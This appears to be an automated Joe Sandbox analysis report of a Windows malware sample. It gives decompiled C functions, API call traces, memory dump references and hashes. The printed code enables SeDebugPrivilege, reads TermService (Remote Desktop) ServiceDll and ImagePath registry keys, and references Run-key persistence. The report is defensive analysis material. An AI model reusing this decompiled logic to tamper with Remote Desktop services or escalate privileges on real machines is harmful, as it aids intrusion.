                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegCloseKey.ADVAPI32(00000000,2CD7C1E8,?,00000000), ref: 004056EA
                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 0040573A
                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?), ref: 00405792
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00405815
                                                                    • GetModuleHandleA.KERNEL32(Advapi32.dll,?,?,?,?), ref: 00405861
                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 0040587B
                                                                    • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,0002001F,00000000,?,?,?,?), ref: 004058C5
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004058D4
                                                                    • RegCloseKey.ADVAPI32(00000000,2CD7C1E8,?,00000000), ref: 00406681
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Close$AddressHandleModuleOpenProc
                                                                    • String ID: Advapi32.dll$RegOpenKeyTransactedA
                                                                    • API String ID: 1177782415-496252237
                                                                    • Opcode ID: b4c01026a143687f20e34d0287e17c992046d964f46a17ca0f730238ae0d3326
                                                                    • Instruction ID: 52dea58d6fd1864949a0b74c4eb67e1190943b2b31d3c2c44895b4125e5da2f3
                                                                    • Opcode Fuzzy Hash: b4c01026a143687f20e34d0287e17c992046d964f46a17ca0f730238ae0d3326
                                                                    • Instruction Fuzzy Hash: 67C12DB1A016299FDB219F14CC40B9AB7B5EB48314F4041FAEA09B7381DB399E94CF5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403600 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 195COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000104), ref: 00403633
                                                                      • Part of subcall function 004039D0: GetLastError.KERNEL32(?,80070057,8007000E,80004005,?,004036AD,00000000,?,00000106,?,?,00000000,00000104), ref: 004039D0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastModuleName
                                                                    • String ID: InprocServer32$LocalServer32$MODULEGUID$MODULETYPE$Module$Module_Raw
                                                                    • API String ID: 2776309574-664224703
                                                                    • Opcode ID: a8418159842711f7d06213fe0230953b7beead7843f29a8dea78e184c4005e27
                                                                    • Instruction ID: 7a119ec535a6d13420535af0fb9d5bc46c472d27a6ba2ac0ee5c9fcfc197c1b0
                                                                    • Opcode Fuzzy Hash: a8418159842711f7d06213fe0230953b7beead7843f29a8dea78e184c4005e27
                                                                    • Instruction Fuzzy Hash: BF61C8B1B44215ABD7219F60CC85FEA77ACAB04705F1041BFF905B72C1EBB8EB448A59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1D58D Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 71serviceCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1D58D(struct _QUERY_SERVICE_CONFIG* _a4) {
				int _v8;
				void* __ecx;
				void* _t10;
				void* _t26;
				struct _QUERY_SERVICE_CONFIG* _t34;
				void* _t37;

				_v8 = 0;
				_t10 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t37 = _t10;
				if(_t37 != 0) {
					_t26 = OpenServiceW(_t37,  *_a4, 1);
					if(_t26 != 0) {
						if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
							_t34 = E02D15EFF(_v8);
							_a4 = _t34;
							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
								CloseServiceHandle(_t37);
								CloseServiceHandle(_t26);
								E02D11099(_a4);
								_t10 =  *(_t34 + 4);
							} else {
								goto L6;
							}
						} else {
							L6:
							CloseServiceHandle(_t37);
							CloseServiceHandle(_t26);
							goto L7;
						}
					} else {
						CloseServiceHandle(_t37);
						L7:
						_t10 = 0;
					}
				}
				return _t10;
			}









                                                                    0x02d1d59d
                                                                    0x02d1d5a0
                                                                    0x02d1d5a6
                                                                    0x02d1d5aa
                                                                    0x02d1d5bf
                                                                    0x02d1d5c3
                                                                    0x02d1d5dd
                                                                    0x02d1d5f2
                                                                    0x02d1d5fb
                                                                    0x02d1d608
                                                                    0x02d1d624
                                                                    0x02d1d627
                                                                    0x02d1d62c
                                                                    0x02d1d632
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1d60a
                                                                    0x02d1d60a
                                                                    0x02d1d611
                                                                    0x02d1d614
                                                                    0x00000000
                                                                    0x02d1d614
                                                                    0x02d1d5c5
                                                                    0x02d1d5c6
                                                                    0x02d1d616
                                                                    0x02d1d616
                                                                    0x02d1d616
                                                                    0x02d1d634
                                                                    0x02d1d638

                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 02D1D5A0
                                                                    • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 02D1D5B9
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D5C6
                                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 02D1D5D5
                                                                    • GetLastError.KERNEL32 ref: 02D1D5DF
                                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 02D1D600
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D611
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D614
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D624
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D627
                                                                      • Part of subcall function 02D11099: GetProcessHeap.KERNEL32(00000000,00000000,02D21E18,00000000,00000000,00000000,00000000,.bss,00000000), ref: 02D1109F
                                                                      • Part of subcall function 02D11099: HeapFree.KERNEL32(00000000), ref: 02D110A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                                                    • String ID: ServicesActive
                                                                    • API String ID: 1929760286-3071072050
                                                                    • Opcode ID: c8c2bd7463793eaa30298322c88bbe25cc085dece5a83e0691bea9c9a61352c9
                                                                    • Instruction ID: 06b6a657383812eb5f0dfeb4ab9d4e54aed44ab8deef31b28c2ae87a2c4748b9
                                                                    • Opcode Fuzzy Hash: c8c2bd7463793eaa30298322c88bbe25cc085dece5a83e0691bea9c9a61352c9
                                                                    • Instruction Fuzzy Hash: F0117971940258BBDB209B62EE48E9F7BAEEB95350B210425F90A93300DB309E44CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1DED2 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 324COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E02D1DED2(struct _CRITICAL_SECTION* __ecx, void* __edx) {
				char _v28;
				char _v32;
				char _v36;
				char _v52;
				char _v60;
				char _v68;
				char _v76;
				signed int _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr _v104;
				char _v108;
				signed int _v112;
				signed int _v116;
				int _t102;
				int _t103;
				int _t106;
				int _t107;
				void* _t109;
				void* _t110;
				int _t111;
				int _t113;
				int _t114;
				int _t120;
				void* _t121;
				int _t159;
				void* _t172;
				int _t181;
				int _t182;
				signed int _t203;
				char* _t233;
				intOrPtr _t244;
				void* _t248;
				char* _t251;
				void* _t264;
				struct _CRITICAL_SECTION* _t267;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				void* _t281;

				_t264 = __edx;
				_t205 = __ecx;
				_t281 = (_t279 & 0xfffffff8) - 0x5c;
				_t267 = __ecx;
				_t203 = 0;
				_v84 = 0;
				_v80 = 0;
				_v96 = 0;
				EnterCriticalSection(__ecx);
				if(E02D1FC58(_t205) == 1) {
					_t205 =  &_v96;
					E02D1F7E0( &_v96);
				}
				_t270 = _t267 + 0x38;
				_t102 = PathFileExistsW( *(_t267 + 0x38));
				_t283 = _t102;
				if(_t102 != 0) {
					L14:
					_t271 = _t267 + 0x3c;
					_t103 = PathFileExistsW( *(_t267 + 0x3c));
					__eflags = _t103;
					if(_t103 != 0) {
						L20:
						E02D1DCB2(_t267, _t264);
						E02D1DC99(_t267);
						_t208 = _t267;
						_t106 = E02D1DA5B(_t267);
						__eflags = _t106;
						if(_t106 != 0) {
							_t209 = _t267;
							_t107 = E02D1D9B6(_t267, _t264, _t208);
							__eflags = _t107;
							if(_t107 != 0) {
								E02D1DC36(_t209);
								_t109 = E02D135E5( &_v92, L"SeDebugPrivilege");
								_t110 = GetCurrentProcess();
								_t265 = _t109;
								_t111 = E02D1F619(_t110, _t109);
								E02D15EA5(_v96);
								__eflags = _t111;
								if(_t111 != 0) {
									_t213 =  *(_t267 + 0x2c);
									_t113 = E02D20CF6( *(_t267 + 0x2c));
									__eflags = _t113;
									if(_t113 != 0) {
										Sleep(0x3e8);
										_t114 =  *(_t267 + 0x4c);
										__eflags = _t114;
										if(_t114 != 0) {
											_t276 = _t203;
											__eflags = _t276 - _t114;
											do {
												E02D15CA3(_t213 & 0xffffff00 | __eflags > 0x00000000);
												E02D1362D( &_v92,  *((intOrPtr*)(_t267 + 0x44)) + _t276 * 4);
												E02D1D508( &_v96);
												_t213 = _v100;
												E02D15EA5(_v100);
												_t276 = _t276 + 1;
												_v100 = _t203;
												__eflags = _t276 -  *(_t267 + 0x4c);
											} while (_t276 <  *(_t267 + 0x4c));
										}
										Sleep(0x1f4);
										E02D1362D( &_v92, _t267 + 0x28);
										E02D1D508( &_v96);
										_t215 = _v100;
										E02D15EA5(_v100);
										Sleep(0x1f4);
										_t120 = E02D1D63B(_t265, __eflags, _v100);
										__eflags = _t120;
										if(_t120 != 0) {
											_t121 = E02D1FC58(_t215);
											__eflags = _t121 - 1;
											if(_t121 == 1) {
												E02D1F7B9(_v96);
											}
											E02D14F2B( *((intOrPtr*)(_t267 + 0x64)), E02D14B91( &_v68, _t203, _t267 + 0x5c, _t267 + 0x60));
											E02D14B6E( &_v84);
											LeaveCriticalSection(_t267);
											_t203 = 8;
										} else {
											_push(_t267 + 0x60);
											_push(_t267 + 0x5c);
											_push(7);
											goto L34;
										}
									} else {
										E02D1F7B9(_v96);
										_push(_t267 + 0x60);
										_push(_t267 + 0x5c);
										_push(5);
										goto L34;
									}
								} else {
									E02D1F7B9(_v96);
									_push(_t267 + 0x60);
									_push(_t267 + 0x5c);
									_push(3);
									goto L34;
								}
							} else {
								E02D1F7B9(_v96);
								_push(_t267 + 0x60);
								_push(_t267 + 0x5c);
								_push(6);
								goto L34;
							}
						} else {
							E02D1F7B9(_v96);
							_push(_t267 + 0x60);
							_push(_t267 + 0x5c);
							_push(4);
							L34:
							E02D14F2B( *((intOrPtr*)(_t267 + 0x64)), E02D14B91( &_v68));
							E02D14B6E( &_v84);
							LeaveCriticalSection(_t267);
						}
					} else {
						E02D1362D(_t281, _t271);
						E02D20203( &_v32, __eflags, _t205, _t203);
						_t232 =  *((intOrPtr*)(_t267 + 0x58));
						E02D237A8( *((intOrPtr*)(_t267 + 0x58)), _t264,  &_v88,  *((intOrPtr*)(_t267 + 0x64)), 3);
						__eflags = _v100 - _t203;
						if(_v100 != _t203) {
							_t233 =  &_v28;
							_t159 = E02D1FDF0(_t233, _t232, _t232);
							__eflags = _t159;
							if(_t159 != 0) {
								_push(_t233);
								E02D2013D( &_v28,  &_v76);
								E02D20125( &_v36);
							}
							E02D13036( &_v76);
							E02D1FEED( &_v28, __eflags);
							goto L20;
						} else {
							E02D13036( &_v76);
							goto L8;
						}
					}
				} else {
					E02D1362D(_t281, _t270);
					E02D20203( &_v32, _t283, _t205, _t203);
					E02D1362D(_t281, _t267 + 0x40);
					E02D20203( &_v68, _t283,  &_v32, _t203);
					_v116 = _t203;
					_v112 = _t203;
					_v100 = _t203;
					_v96 = _t203;
					_t172 = E02D1FC58( &_v68);
					_t244 =  *((intOrPtr*)(_t267 + 0x58));
					if(_t172 != 1) {
						E02D12E93( &_v96, E02D237A8(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 1));
						E02D13036( &_v84);
						_t278 = _v100;
						E02D12F91( &_v108, _t278, 0x12e00);
						_t248 = _t278 + 0x12e00;
						_t179 = _v104 + 0xfffed200;
						__eflags = _v104 + 0xfffed200;
					} else {
						E02D12E93( &_v96, E02D237A8(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 2));
						E02D13036( &_v84);
						_t278 = _v100;
						E02D12F91( &_v108, _t278, 0x1c800);
						_t248 = _t278 + 0x1c800;
						_t179 = _v104 + 0xfffe3800;
					}
					E02D12F91( &_v76, _t248, _t179);
					_t285 = _t278;
					if(_t278 != 0) {
						_t250 =  &_v28;
						_t181 = E02D1FDF0(_t250,  &_v76,  &_v76);
						__eflags = _t181;
						if(_t181 != 0) {
							_push(_t250);
							E02D2013D( &_v28,  &_v92);
							_t250 =  &_v36;
							E02D20125( &_v36);
						}
						_t251 =  &_v52;
						_t182 = E02D1FDF0(_t251, _t250, _t250);
						__eflags = _t182;
						if(_t182 != 0) {
							_push(_t251);
							E02D2013D( &_v52,  &_v76);
							E02D20125( &_v60);
						}
						E02D13036( &_v76);
						E02D13036( &_v92);
						E02D1FEED( &_v52, __eflags);
						_t205 =  &_v28;
						E02D1FEED( &_v28, __eflags);
						goto L14;
					} else {
						E02D13036( &_v76);
						E02D13036( &_v92);
						E02D1FEED( &_v52, _t285);
						L8:
						E02D1FEED( &_v28, _t285);
						_t203 = _t203 | 0xffffffff;
					}
				}
				E02D13036( &_v84);
				return _t203;
			}














































                                                                    0x02d1ded2
                                                                    0x02d1ded2
                                                                    0x02d1ded8
                                                                    0x02d1dede
                                                                    0x02d1dee0
                                                                    0x02d1dee3
                                                                    0x02d1dee7
                                                                    0x02d1deeb
                                                                    0x02d1deef
                                                                    0x02d1defd
                                                                    0x02d1deff
                                                                    0x02d1df03
                                                                    0x02d1df03
                                                                    0x02d1df08
                                                                    0x02d1df0d
                                                                    0x02d1df13
                                                                    0x02d1df15
                                                                    0x02d1e094
                                                                    0x02d1e094
                                                                    0x02d1e099
                                                                    0x02d1e09f
                                                                    0x02d1e0a1
                                                                    0x02d1e115
                                                                    0x02d1e117
                                                                    0x02d1e11e
                                                                    0x02d1e123
                                                                    0x02d1e125
                                                                    0x02d1e12a
                                                                    0x02d1e12c
                                                                    0x02d1e147
                                                                    0x02d1e149
                                                                    0x02d1e14e
                                                                    0x02d1e150
                                                                    0x02d1e16a
                                                                    0x02d1e178
                                                                    0x02d1e17f
                                                                    0x02d1e185
                                                                    0x02d1e189
                                                                    0x02d1e194
                                                                    0x02d1e199
                                                                    0x02d1e19b
                                                                    0x02d1e1b5
                                                                    0x02d1e1b8
                                                                    0x02d1e1bd
                                                                    0x02d1e1bf
                                                                    0x02d1e1e4
                                                                    0x02d1e1e6
                                                                    0x02d1e1e9
                                                                    0x02d1e1eb
                                                                    0x02d1e1ed
                                                                    0x02d1e1ef
                                                                    0x02d1e1f1
                                                                    0x02d1e1f4
                                                                    0x02d1e204
                                                                    0x02d1e20e
                                                                    0x02d1e213
                                                                    0x02d1e217
                                                                    0x02d1e21f
                                                                    0x02d1e220
                                                                    0x02d1e224
                                                                    0x02d1e224
                                                                    0x02d1e228
                                                                    0x02d1e233
                                                                    0x02d1e23d
                                                                    0x02d1e247
                                                                    0x02d1e24c
                                                                    0x02d1e250
                                                                    0x02d1e25a
                                                                    0x02d1e25d
                                                                    0x02d1e262
                                                                    0x02d1e264
                                                                    0x02d1e294
                                                                    0x02d1e299
                                                                    0x02d1e29c
                                                                    0x02d1e2a2
                                                                    0x02d1e2a2
                                                                    0x02d1e2bd
                                                                    0x02d1e2c6
                                                                    0x02d1e2cc
                                                                    0x02d1e2d4
                                                                    0x02d1e266
                                                                    0x02d1e269
                                                                    0x02d1e26d
                                                                    0x02d1e26e
                                                                    0x00000000
                                                                    0x02d1e26e
                                                                    0x02d1e1c1
                                                                    0x02d1e1c5
                                                                    0x02d1e1cd
                                                                    0x02d1e1d1
                                                                    0x02d1e1d2
                                                                    0x00000000
                                                                    0x02d1e1d2
                                                                    0x02d1e19d
                                                                    0x02d1e1a1
                                                                    0x02d1e1a9
                                                                    0x02d1e1ad
                                                                    0x02d1e1ae
                                                                    0x00000000
                                                                    0x02d1e1ae
                                                                    0x02d1e152
                                                                    0x02d1e156
                                                                    0x02d1e15e
                                                                    0x02d1e162
                                                                    0x02d1e163
                                                                    0x00000000
                                                                    0x02d1e163
                                                                    0x02d1e12e
                                                                    0x02d1e132
                                                                    0x02d1e13a
                                                                    0x02d1e13e
                                                                    0x02d1e13f
                                                                    0x02d1e270
                                                                    0x02d1e27d
                                                                    0x02d1e286
                                                                    0x02d1e28c
                                                                    0x02d1e28c
                                                                    0x02d1e0a3
                                                                    0x02d1e0a8
                                                                    0x02d1e0b1
                                                                    0x02d1e0b6
                                                                    0x02d1e0c3
                                                                    0x02d1e0c8
                                                                    0x02d1e0cc
                                                                    0x02d1e0de
                                                                    0x02d1e0e2
                                                                    0x02d1e0e7
                                                                    0x02d1e0e9
                                                                    0x02d1e0eb
                                                                    0x02d1e0f5
                                                                    0x02d1e0fe
                                                                    0x02d1e0fe
                                                                    0x02d1e107
                                                                    0x02d1e110
                                                                    0x00000000
                                                                    0x02d1e0ce
                                                                    0x02d1e0d2
                                                                    0x00000000
                                                                    0x02d1e0d2
                                                                    0x02d1e0cc
                                                                    0x02d1df1b
                                                                    0x02d1df20
                                                                    0x02d1df29
                                                                    0x02d1df36
                                                                    0x02d1df3f
                                                                    0x02d1df44
                                                                    0x02d1df48
                                                                    0x02d1df4c
                                                                    0x02d1df50
                                                                    0x02d1df54
                                                                    0x02d1df59
                                                                    0x02d1df63
                                                                    0x02d1dfb7
                                                                    0x02d1dfc0
                                                                    0x02d1dfc5
                                                                    0x02d1dfd3
                                                                    0x02d1dfdc
                                                                    0x02d1dfe2
                                                                    0x02d1dfe2
                                                                    0x02d1df65
                                                                    0x02d1df75
                                                                    0x02d1df7e
                                                                    0x02d1df83
                                                                    0x02d1df91
                                                                    0x02d1df9a
                                                                    0x02d1dfa0
                                                                    0x02d1dfa0
                                                                    0x02d1dfed
                                                                    0x02d1dff2
                                                                    0x02d1dff4
                                                                    0x02d1e024
                                                                    0x02d1e028
                                                                    0x02d1e02d
                                                                    0x02d1e02f
                                                                    0x02d1e031
                                                                    0x02d1e03b
                                                                    0x02d1e040
                                                                    0x02d1e044
                                                                    0x02d1e044
                                                                    0x02d1e04b
                                                                    0x02d1e04f
                                                                    0x02d1e054
                                                                    0x02d1e056
                                                                    0x02d1e058
                                                                    0x02d1e062
                                                                    0x02d1e06b
                                                                    0x02d1e06b
                                                                    0x02d1e074
                                                                    0x02d1e07d
                                                                    0x02d1e086
                                                                    0x02d1e08b
                                                                    0x02d1e08f
                                                                    0x00000000
                                                                    0x02d1dff6
                                                                    0x02d1dffa
                                                                    0x02d1e003
                                                                    0x02d1e00c
                                                                    0x02d1e011
                                                                    0x02d1e015
                                                                    0x02d1e01a
                                                                    0x02d1e01a
                                                                    0x02d1dff4
                                                                    0x02d1e2d9
                                                                    0x02d1e2e6

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32 ref: 02D1DEEF
                                                                      • Part of subcall function 02D1FC58: GetCurrentProcess.KERNEL32(?,?,02D12D84,?,02D24648,?,?,00000000,?,?,?), ref: 02D1FC5C
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 02D1E099
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 02D1DF0D
                                                                      • Part of subcall function 02D1FDF0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000,?,?,?,02D19A69,?,?,?), ref: 02D1FE07
                                                                      • Part of subcall function 02D1FDF0: GetLastError.KERNEL32(?,?,?,02D19A69,?,?,?), ref: 02D1FE15
                                                                    • LeaveCriticalSection.KERNEL32(?,00000000), ref: 02D1E28C
                                                                      • Part of subcall function 02D1D9B6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 02D1D9EA
                                                                    • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 02D1E17F
                                                                    • LeaveCriticalSection.KERNEL32(?,00000000), ref: 02D1E2CC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 1717069549-2896544425
                                                                    • Opcode ID: 21186043ae3416532f29f85326fcdceed3b431af0477c3acbddcbc763b1cb4ee
                                                                    • Instruction ID: 2054353430e045d7c8ae5bffad5263c30a1c8f216dd0b1024dbfd90e5edcc382
                                                                    • Opcode Fuzzy Hash: 21186043ae3416532f29f85326fcdceed3b431af0477c3acbddcbc763b1cb4ee
                                                                    • Instruction Fuzzy Hash: 7EB11F71508355BBC718EB60EC90DAEB7AAFF54344F40092DF55293A90EB64ED09CF62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1DCB2 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 111registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1DCB2(void* __ecx, void* __edx) {
				void* _v8;
				WCHAR* _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				char _v28;
				int _v32;
				char _v36;
				void* _t50;
				void* _t62;
				void* _t72;
				void* _t96;

				_t96 = __edx;
				_t72 = __ecx;
				_v8 = 0;
				E02D135E5( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
				E02D135E5( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v36 = 0;
				_v32 = 0;
				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
					_t50 = E02D20FC3(_t96, E02D135E5( &_v16, L"ImagePath"),  &_v36);
					E02D15EA5(_v16);
					E02D20FAE( &_v8);
					if(_t50 != 0) {
						E02D12ECF( &_v36,  &_v12);
						E02D12FC3( &_v36);
						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
								_t62 = E02D20FC3(_t96, E02D135E5( &_v16, L"ServiceDll"),  &_v36);
								E02D15EA5(_v16);
								_t107 = _t62;
								if(_t62 != 0) {
									E02D13437(_t72 + 0x20, E02D131D4( &_v16, E02D12ECF( &_v36,  &_v28), _t107));
									E02D15EA5(_v16);
									_v16 = _v16 & 0x00000000;
									E02D15EA5(_v28);
								}
								E02D20FAE( &_v8);
							}
						}
						E02D15EA5(_v12);
						_v12 = _v12 & 0x00000000;
					}
				}
				E02D13036( &_v36);
				E02D15EA5(_v20);
				E02D15EA5(_v24);
				return E02D20FAE( &_v8);
			}















                                                                    0x02d1dcb2
                                                                    0x02d1dcba
                                                                    0x02d1dcc6
                                                                    0x02d1dcc9
                                                                    0x02d1dcd6
                                                                    0x02d1dcde
                                                                    0x02d1dceb
                                                                    0x02d1dcfb
                                                                    0x02d1dd16
                                                                    0x02d1dd20
                                                                    0x02d1dd28
                                                                    0x02d1dd2f
                                                                    0x02d1dd3c
                                                                    0x02d1dd44
                                                                    0x02d1dd5b
                                                                    0x02d1dd8a
                                                                    0x02d1dda1
                                                                    0x02d1ddab
                                                                    0x02d1ddb0
                                                                    0x02d1ddb2
                                                                    0x02d1ddce
                                                                    0x02d1ddd6
                                                                    0x02d1ddde
                                                                    0x02d1dde2
                                                                    0x02d1dde2
                                                                    0x02d1ddea
                                                                    0x02d1ddea
                                                                    0x02d1dd8a
                                                                    0x02d1ddf2
                                                                    0x02d1ddf7
                                                                    0x02d1ddf7
                                                                    0x02d1dd2f
                                                                    0x02d1ddfe
                                                                    0x02d1de06
                                                                    0x02d1de0e
                                                                    0x02d1de1e

                                                                    APIs
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 02D1DCF3
                                                                      • Part of subcall function 02D20FC3: RegQueryValueExW.ADVAPI32(?,745D0770,00000000,745D0770,00000000,00000000,?,00000000,02D235AB,?,?,?,02D215B2,?,?,80000001), ref: 02D20FE6
                                                                      • Part of subcall function 02D20FC3: RegQueryValueExW.ADVAPI32(?,745D0770,00000000,745D0770,00000000,00000000,?,02D215B2,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 02D2100A
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D20FAE: RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
                                                                    • StrStrW.SHLWAPI(?,svchost.exe,?,00000000,ImagePath,?), ref: 02D1DD57
                                                                    • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 02D1DD65
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 02D1DD82
                                                                    Strings
                                                                    • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 02D1DCCE
                                                                    • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 02D1DCBE
                                                                    • ServiceDll, xrefs: 02D1DD90
                                                                    • svchost.exe -k, xrefs: 02D1DD5D
                                                                    • ImagePath, xrefs: 02D1DD05
                                                                    • svchost.exe, xrefs: 02D1DD4F
                                                                    Memory Dump Source
